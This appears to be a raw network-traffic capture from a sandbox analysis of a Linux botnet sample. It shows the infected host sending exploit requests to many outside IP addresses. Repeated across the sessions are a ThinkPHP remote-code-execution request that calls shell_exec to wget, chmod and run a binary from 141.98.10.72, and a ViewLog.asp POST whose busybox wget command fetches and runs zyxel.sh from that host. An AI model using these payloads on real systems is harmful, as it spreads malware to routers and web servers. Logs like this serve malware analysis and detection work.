                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            1015192.168.2.2350512112.175.51.20980
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:30:15.804292917 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:30:16.082380056 CET143INHTTP/1.1 400 Bad Request
                                                            Server: Cougar/9.01.01.5001
                                                            Date: Wed, 14 Feb 2024 08:30:16 GMT
                                                            Pragma: no-cache
                                                            Connection: close


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            1016192.168.2.235312031.136.66.2138080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:30:15.932562113 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:16.560261011 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:17.808077097 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:20.463829994 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:25.583054066 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:35.565799952 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:56.298815966 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            1017192.168.2.2336500112.15.44.20180
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:30:15.948894978 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            1018192.168.2.235927488.221.180.21480
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:30:15.991456032 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:30:16.179183960 CET480INHTTP/1.0 400 Bad Request
                                                            Server: AkamaiGHost
                                                            Mime-Version: 1.0
                                                            Content-Type: text/html
                                                            Content-Length: 258
                                                            Expires: Wed, 14 Feb 2024 08:30:16 GMT
                                                            Date: Wed, 14 Feb 2024 08:30:16 GMT
                                                            Connection: close
                                                            Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 63 64 33 65 31 32 30 32 26 23 34 36 3b 31 37 30 37 38 39 39 34 31 36 26 23 34 36 3b 39 31 66 37 63 39 66 62 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                            Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;cd3e1202&#46;1707899416&#46;91f7c9fb</BODY></HTML>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            1019192.168.2.235042488.99.147.580
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:30:16.008363962 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:30:16.212661028 CET200INHTTP/1.0 400 Bad request
                                                            Cache-Control: no-cache
                                                            Connection: close
                                                            Content-Type: text/html
                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 72 65 71 75 65 73 74 3c 2f 68 31 3e 0a 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 6e 20 69 6e 76 61 6c 69 64 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0a
                                                            Data Ascii: <html><body><h1>400 Bad request</h1>Your browser sent an invalid request.</body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            1020192.168.2.234579888.73.152.25580
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:30:16.024812937 CET319OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:30:16.246331930 CET392INHTTP/1.1 400 Bad Request
                                                            Date: Wed, 14 Feb 2024 03:46:47 GMT
                                                            Server: Apache
                                                            Content-Length: 226
                                                            Connection: close
                                                            Content-Type: text/html; charset=iso-8859-1
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            1021192.168.2.235067088.148.64.10380
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:30:16.028101921 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:30:16.252772093 CET321INHTTP/1.1 400 Bad Request
                                                            Server: nginx/1.19.4
                                                            Date: Wed, 14 Feb 2024 08:30:16 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 157
                                                            Connection: close
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 39 2e 34 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.19.4</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            1022192.168.2.235133294.120.30.998080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:30:16.030473948 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            1023192.168.2.233541862.29.119.38080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:30:16.030658007 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            1024192.168.2.233303688.86.193.21780
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:30:16.056657076 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:30:16.309328079 CET317INHTTP/1.1 400 Bad Request
                                                            Server: Web server
                                                            Date: Wed, 14 Feb 2024 08:30:13 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 155
                                                            Connection: close
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 57 65 62 20 73 65 72 76 65 72 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>Web server</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            1025192.168.2.235044088.99.147.580
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:30:16.428666115 CET200INHTTP/1.0 400 Bad request
                                                            Cache-Control: no-cache
                                                            Connection: close
                                                            Content-Type: text/html
                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 72 65 71 75 65 73 74 3c 2f 68 31 3e 0a 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 6e 20 69 6e 76 61 6c 69 64 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0a
                                                            Data Ascii: <html><body><h1>400 Bad request</h1>Your browser sent an invalid request.</body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            1026192.168.2.233624631.136.32.1208080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:30:18.520021915 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:19.183983088 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:20.463855028 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:23.023365974 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:28.142644882 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:38.381445885 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:31:00.394284964 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            1027192.168.2.235497888.221.151.1380
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:30:18.586704969 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:30:18.781282902 CET480INHTTP/1.0 400 Bad Request
                                                            Server: AkamaiGHost
                                                            Mime-Version: 1.0
                                                            Content-Type: text/html
                                                            Content-Length: 258
                                                            Expires: Wed, 14 Feb 2024 08:30:18 GMT
                                                            Date: Wed, 14 Feb 2024 08:30:18 GMT
                                                            Connection: close
                                                            Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 31 32 39 31 64 64 35 38 26 23 34 36 3b 31 37 30 37 38 39 39 34 31 38 26 23 34 36 3b 36 39 33 34 32 37 32 65 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                            Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;1291dd58&#46;1707899418&#46;6934272e</BODY></HTML>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            1028192.168.2.235861888.218.157.22480
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:30:18.595832109 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:30:18.825561047 CET516INHTTP/1.0 400 Bad Request
                                                            Content-Type: text/html
                                                            Content-Length: 349
                                                            Connection: close
